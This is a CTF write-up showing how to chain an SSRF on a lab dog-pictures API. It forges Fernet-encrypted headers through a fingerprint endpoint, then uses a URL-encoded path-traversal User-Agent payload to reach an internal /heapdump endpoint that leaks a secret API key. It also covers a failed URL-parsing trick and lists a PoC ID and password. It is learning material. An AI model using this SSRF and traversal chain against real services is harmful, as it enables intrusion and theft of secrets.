BugPoC x NahamSec CTF write-up: SSRF + internal heapdump
Analysis
After examining the HTTP traffic and script.js
the following important things became clear:
- There are three hosts:
doggo.buggywebsite.com
-> which hosts the web front-end components (including script.js).doggo-api.buggywebsite.com
-> API which has the/fingerprint
and/get-dogs
endpoints exposed.buggy-dog-pics.s3-us-west-2.amazonaws.com
-> S3 bucket which hosts the dog images.
- The application is hosted on AWS infra since all above endpoints return headers such as
x-amz-request-id
,x-amz-id-2
,Apigw-Requestid
. - The
/get-dogs
endpoint does the following:- Decrypts the
x-param
header which is an encrypted Fernet string. - It then makes an internal request to “
<api-host>
+/dogs
+decrypted-value-of-x-param
”. - It returns the
path
,statusCode
andresponse
from the above server-side request.- This strongly hinted at an SSRF vuln if the user could forge a valid
x-param
string. Luckily the/fingerprint
allowed us to do exactly this.
- This strongly hinted at an SSRF vuln if the user could forge a valid
- The
path
value in response makes this endpoint a useful decryption primitive.
- Decrypts the
- The
/fingerprint
endpoint returns the Fernet encrypted value of{"UA": <User-Agent-request-header-value>}
- By passing arbitrary user-agent values, we can generate valid strings which have been encrypted using the server Fernet key and may therefore be useful for SSRF as mentioned above.
- This endpoint is a useful encryption primitive.
- There are some API endpionts which are not accessible to external users:
/dogs
gives the response:Error, this endpoint is only internally accessible
.
Solution steps
- In order for the SSRF to work, we need to know if we can actually control the path. Since the path by default begins with
/dogs
and if we send encrypted data from/fingerprint
it will also contain json characters like{\"UA\":\"
, we will need to do path traversal to have full control over the request path. - To test this, send a request to
/fingerprint
withUser-agent
set to%2e%2e%2f%2e%2e%2fdogs?page=1#
where%2e
and%2f
are url-encoded values of.
and/
. The#
at the end makes the rest of the trailing characters like}
irrelevant as a url fragment. Use the encrypted fingerprint from the response as the value forx-param
header in a request to/get-dogs
. - This results in a valid server-side request to
/dogs?page=1
- The
/dogs?page=x
endpoint just returns an array of5x-4
to5x
number formatted stringshttps://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog{number}.jpg
.
- The
- We may now change the path and parameters to point to other internal endpoints.
- After trying and brute-forcing multiple endpoints I still could not figure out what might work until after I saw the hint posted on twitter about heapdumps.
- A server-side request sent to
/heapdump
resulted in, as the name says, heap dump of the python data.- Trying the
/heapdump
endpoint from an external-request gives the same response as that from/dogs
:Error, this endpoint is only internally accessible
. - This confirmed that it is an internal endpoint which could leak sensitive data through SSRF.
- Trying the
- The response from the SSRF request made to
/heapdump
included theSECRET_API_KEY
as well and voila, I got the flag :) .
BugPoC python script:
- BugPoC ID: bp-YdjHgElZ
- Password: bIgBoNObo83
Deadends
I tried a few other things which didn’t work:
- Breaking the Fernet encryption scheme:
- Fernet encryption is pretty robust if used properly. It is not vulnerable to known or chosen-plaintext attacks which I could have used here with the primitives at hand.
- Since I did not have the encryption key, this was a deadend.
- Attacking python requests library URL parsing:
- I knew python requests library was being used in the backend because once I could control the path of server-side request, if an internal request was sent to
/fingerprint
, and the resulting string decrypted using/get-dogs
, it showed that the User-Agent waspython-requests/2.22.0
. - Knowing this, I tried to have control over the host for SSRF as well but this didn’t work. I tried fooling the url-parsing of python requests library. This would have been possible if the url concatenation would have been like
http://<intended-host><any-data-except-fwd-slash-i-guess>
+@<attacker-controlled-host>
in which case the library would send a request to<attacker-controlled-host>
instead of<intended-host>
. Unfortunately since we could only add a controlled string after/dogs
(which contains a forward slash), this didn’t work out either. - This maybe a good CTF challenge idea for a future challenge ;) .
- I knew python requests library was being used in the backend because once I could control the path of server-side request, if an internal request was sent to
Summary
Overall I liked the task. It required reverse-engineering and understanding how the application back-end might be functioning through the web traffic alone. Getting stuck not knowing what to do after SSRF was frustrating but the hint really helped! Without it, it felt like a guessing task as I was brute-forcing common paths. However, judging from the heap dump itself which contains lambda_function
definitions, the /heapdump
endpoint might be a common thing for a python aws lambda application which I should have known?